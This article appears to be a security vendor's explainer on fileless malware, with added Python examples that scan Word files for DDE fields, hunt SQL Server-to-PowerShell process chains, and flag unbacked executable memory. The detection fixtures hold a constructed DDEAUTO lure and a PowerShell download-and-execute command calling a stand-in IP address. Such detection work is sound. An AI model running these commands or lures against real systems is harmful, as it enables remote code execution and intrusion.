What is a Fileless Cyberattack?
The Threat that Directly Loads Malicious Code into Memory
Cyber threat actors are constantly developing more sophisticated techniques to infect systems. The best-known method is delivering a malicious file, as an email attachment or a web download, that writes malware to disk and runs it. However, in recent years the industry has seen a sharp rise in a more complex form of attack: fileless malware. But what exactly is it?
Instead of installing a malicious application on the victim's hard drive like traditional malware, fileless malware loads its malicious code directly into memory. It tends to use two entry vectors: it either exploits an existing vulnerability in a program the victim uses, or it arrives as something that is never installed as an executable, such as a script run by a legitimate interpreter already on the system. Fileless malware often injects its code into the memory of processes that are already running, which makes it very difficult for conventional antivirus solutions, which scan files on disk, to detect.
Although these techniques are not new (the first memory-resident viruses emerged in the 1980s), there has been exponential growth in cases since 2016. At WatchGuard, we have registered more than 200,000 different malware samples originating from scripts since 2020, compared with fewer than 50,000 from browsers, which comes second in the entry point ranking. This is an increase of 888% compared to 2019.
These threats include Word DDE (Dynamic Data Exchange) abuse, which uses a legitimate feature of Microsoft Office documents, a field that asks another application for data, to run a command on the computer without using macros. But the most prominent fileless cyberattacks are living-off-the-land (LotL) attacks, which run their payload with tools already present on the system, such as the famous Astaroth case.
Another example of a LotL attack we investigated recently involved obtaining the victim's SQL Server credentials and triggering a stored procedure that allows the attacker to launch the Windows utility PowerShell, which then downloads and executes the malware. Because every step runs through legitimate, signed binaries, these attacks often go undetected, even if you have cybersecurity tools in place. So, how can organizations protect themselves from fileless malware?
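A check a defender can run on inbound documents, as an added example that is not part of the original article: unpack a .docx, reassemble every field code in the body, headers and footers, and flag any that invokes DDE or DDEAUTO. The two sample documents are constructed in memory (a real Word file also carries relationships and styles parts, which this scanner does not need); the `build_docx`, `scan_docx` and `field_instructions` names are this example's own.

```python
"""Scan a .docx for DDE / DDEAUTO field codes, the Office feature abused to run
commands without macros. Added example; the sample documents are constructed here."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET  # expat does not resolve external entities by default

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)
PARTS_RE = re.compile(r"^word/(document|header\d*|footer\d*)\.xml$")


def field_instructions(part_xml: bytes):
    """Yield the instruction text of every field in one WordprocessingML part.

    Simple fields carry the instruction in w:fldSimple/@w:instr. Complex fields are
    split into runs (w:fldChar begin ... w:instrText ... w:fldChar separate/end) and
    lures split 'DDE' / 'AUTO' across runs, so the runs are reassembled before matching.
    (Character-code obfuscation via a nested QUOTE field is not decoded here.)
    """
    root = ET.fromstring(part_xml)
    for fld in root.iter(f"{{{W}}}fldSimple"):
        yield fld.get(f"{{{W}}}instr", "")
    chunks, in_field = [], False
    for el in root.iter():
        if el.tag == f"{{{W}}}fldChar":
            kind = el.get(f"{{{W}}}fldCharType")
            if kind == "begin":
                chunks, in_field = [], True
            elif kind in ("separate", "end") and in_field:
                yield "".join(chunks)
                chunks, in_field = [], False
        elif in_field and el.tag == f"{{{W}}}instrText":
            chunks.append(el.text or "")


def scan_docx(docx_bytes: bytes) -> list[str]:
    """Return every field instruction that invokes DDE, whitespace-normalised."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if PARTS_RE.match(name):
                for instr in field_instructions(zf.read(name)):
                    if DDE_RE.search(instr):
                        hits.append(" ".join(instr.split()))
    return hits


def build_docx(body_xml: str) -> bytes:
    """Build a minimal in-memory .docx (constructed fixture, not a real Word export)."""
    doc = f'<w:document xmlns:w="{W}"><w:body>{body_xml}</w:body></w:document>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", doc)
    return buf.getvalue()


BENIGN_BODY = "<w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p>"
# Constructed DDE lure: keyword split across two runs, harmless command for illustration.
DDE_BODY = (
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">AUTO c:\\Windows\\System32\\cmd.exe "/c whoami" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>Quarterly report</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("dde", DDE_BODY)):
        print(label, scan_docx(build_docx(body)))
```

Matching on the reassembled instruction rather than on raw bytes is the point: a `grep DDEAUTO` over the zip members misses the split-run form that real lures use.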
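The chain just described leaves a process-lineage trail that is hard to hide: a database engine spawning a shell, and that shell spawning PowerShell with download-and-execute switches. The following hunt over process-creation telemetry is an added example, not code from the original article or from WatchGuard: the four JSON records are constructed Sysmon-style events (field names assumed; the 203.0.113.7 address is from the documentation range), and the rule names `shell_in_sqlserver_lineage` and `download_execute_cues` are this example's own.

```python
"""Hunt process-creation telemetry for the living-off-the-land chain
SQL Server -> shell -> PowerShell download-and-execute. Added example; events are constructed."""
import json
import re
from dataclasses import dataclass

SQL_SERVER = "sqlservr.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line cues for PowerShell download-and-execute plus common evasion switches.
LOTL_CUES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|invoke-expression|\biex\b"
    r"|frombase64string|-enc(?:odedcommand)?\b|-nop\b|-w(?:indowstyle)?\s+hidden|-ep\s+bypass",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    ts: str
    pid: int
    ppid: int
    image: str
    parent_image: str
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def load_events(jsonl: str) -> list[ProcEvent]:
    """Parse Sysmon-style ProcessCreate records exported as JSON lines (field names assumed)."""
    events = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        r = json.loads(line)
        events.append(ProcEvent(r["UtcTime"], int(r["ProcessId"]), int(r["ParentProcessId"]),
                                r["Image"], r["ParentImage"], r["CommandLine"]))
    return events


def detect(events: list[ProcEvent]) -> dict[int, set[str]]:
    """Return the set of rule names that fire for each process id."""
    by_pid = {e.pid: e for e in events}  # pid reuse over long windows needs time bounds too
    findings: dict[int, set[str]] = {}
    for e in events:
        rules = set()
        if basename(e.image) in SHELLS:
            # Lineage = the logged parent image plus every ancestor whose own creation event
            # is in the window, so sqlservr -> cmd -> powershell fires at both hops.
            lineage = [basename(e.parent_image)]
            seen, cur = set(), by_pid.get(e.ppid)
            while cur is not None and cur.pid not in seen:
                seen.add(cur.pid)
                lineage.append(basename(cur.image))
                cur = by_pid.get(cur.ppid)
            if SQL_SERVER in lineage:
                rules.add("shell_in_sqlserver_lineage")
        if LOTL_CUES.search(e.cmdline):
            rules.add("download_execute_cues")
        findings[e.pid] = rules
    return findings


# Constructed events: a normal SQL Server start, the LotL chain, and a benign admin script.
SAMPLE_EVENTS = r"""
{"UtcTime":"2023-05-02 10:14:03","ProcessId":1208,"ParentProcessId":640,"Image":"C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe","ParentImage":"C:\\Windows\\System32\\services.exe","CommandLine":"sqlservr.exe -sMSSQLSERVER"}
{"UtcTime":"2023-05-02 10:31:47","ProcessId":4420,"ParentProcessId":1208,"Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe","CommandLine":"cmd.exe /c powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"}
{"UtcTime":"2023-05-02 10:31:47","ProcessId":4436,"ParentProcessId":4420,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"}
{"UtcTime":"2023-05-02 10:35:10","ProcessId":5100,"ParentProcessId":3012,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe -File C:\\Scripts\\rotate-logs.ps1"}
"""

if __name__ == "__main__":
    for pid, rules in detect(load_events(SAMPLE_EVENTS)).items():
        print(pid, sorted(rules) or "-")
```

The lineage rule is the durable one: command-line cues can be obfuscated, but a database engine has no business starting cmd.exe or PowerShell, and that parent-child relationship is visible in 4688/Sysmon telemetry whatever the payload looks like.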
Traditional cybersecurity solutions primarily base their analysis on signatures of known malware, which presumes there is a file on disk to match. Today they can also detect some anomalous patterns in code structure that may indicate script-based attacks of varying sophistication.
However, although these tools are constantly updated, they are insufficient against the most dangerous and advanced threats, such as fileless cyberattacks or those from APT groups, which can even take advantage of zero-day vulnerabilities for which no signature or patch yet exists.
This is where advanced Endpoint Detection and Response (EDR) solutions come in. In addition to preventing intrusions and detecting advanced malware, they focus on detecting malware after it has executed. For this purpose they rely on contextual detections (what a process did, what started it and what it touched) under a zero-trust premise: every process is treated as potentially hostile until it is classified, rather than trusted because no signature matched. They also use threat hunting services that correlate suspicious activities to identify attacks that evade automated detection. Moreover, these solutions perform a thorough inspection of the systems' memory to detect potential code injections and exploits.
This makes even the most sophisticated threats, such as fileless attacks, easier to detect. And if this malware has already managed to get in, EDR solutions enable organizations to reduce detection and response time, and therefore recovery time, thanks to their post-execution functionality. This is ultimately a key factor in mitigating any damage that the malware may have caused.
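One of the memory-inspection heuristics mentioned here, and the counterpart to the injection into running processes described earlier in the article, is to look for executable memory that no file on disk accounts for: code injected at runtime or loaded from a deleted or memfd-backed file lands in exactly such regions. The scanner below is an added example, not the article's or any EDR vendor's code; it uses the Linux `/proc/<pid>/maps` view of a process because that runs anywhere, whereas a Windows agent would walk regions with VirtualQueryEx and compare them against loaded modules. The sample maps text is constructed, and `demo()` creates a private anonymous RWX mapping in the current process to show the heuristic catching it live.

```python
"""Flag executable memory regions not backed by a file on disk, one heuristic EDR memory
scanners use to spot injected code. Added example; the sample maps output is constructed."""
import mmap
import re

# start-end perms offset dev inode [path]
MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\d+\s*(.*)$")


def parse_maps(text: str) -> list[tuple[int, int, str, str]]:
    """Parse /proc/<pid>/maps text into (start, end, perms, path) tuples."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line)
        if m:
            regions.append((int(m.group(1), 16), int(m.group(2), 16), m.group(3), m.group(4).strip()))
    return regions


def unbacked_executable(regions):
    """Executable regions with no backing path (anonymous) or whose file was deleted.

    Anonymous RWX is the classic injection footprint; '(deleted)' covers code loaded
    from a file removed after mapping and memfd_create() images, which appear as
    '/memfd:name (deleted)'. Kernel pseudo-mappings such as [vdso] have a bracketed
    name and are not flagged. JIT runtimes and libffi trampolines are legitimate
    anonymous executable memory, so a production scanner allow-lists those or goes on
    to inspect region contents (for example a PE/ELF header where none should be).
    """
    return [r for r in regions
            if "x" in r[2] and (r[3] == "" or r[3].endswith("(deleted)"))]


def demo() -> tuple[int, int]:
    """Count flagged regions in this process before and after mapping anonymous RWX memory."""
    with open("/proc/self/maps") as f:
        before = len(unbacked_executable(parse_maps(f.read())))
    region = mmap.mmap(-1, 4096, flags=mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS,
                       prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
    with open("/proc/self/maps") as f:
        after = len(unbacked_executable(parse_maps(f.read())))
    region.close()
    return before, after


# Constructed maps excerpt: interpreter text, libc, an anonymous RWX page, a deleted
# shared object, the stack and the vDSO.
SAMPLE_MAPS = """\
55e3a8c00000-55e3a8c01000 r--p 00000000 fd:01 1314 /usr/bin/python3
7f2c3b000000-7f2c3b1c0000 r-xp 00025000 fd:01 2207 /usr/lib/x86_64-linux-gnu/libc.so.6
7f2c3b400000-7f2c3b401000 rwxp 00000000 00:00 0
7f2c3b500000-7f2c3b520000 r-xp 00000000 fd:01 9911 /tmp/stage2.so (deleted)
7ffd1e3c0000-7ffd1e3e1000 rw-p 00000000 00:00 0 [stack]
7ffd1e3fe000-7ffd1e400000 r-xp 00000000 00:00 0 [vdso]
"""

if __name__ == "__main__":
    for start, end, perms, path in unbacked_executable(parse_maps(SAMPLE_MAPS)):
        print(f"{start:x}-{end:x} {perms} {path or '<anonymous>'}")
    print("live process: flagged regions before/after RWX mmap =", demo())
```

The same idea drives the Windows-side checks: an executable region that does not belong to any module on the loaded-module list, or whose on-disk image does not match the bytes in memory, is where a memory scanner looks first, because that is exactly what "directly loads malicious code into memory" produces.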
If you are looking for more information about what fileless malware is, how it works, how attackers are using it, and what you need to do to keep your systems safe from this massively popular threat, check this out: Cybersecurity Insights: Fileless Attacks Primer.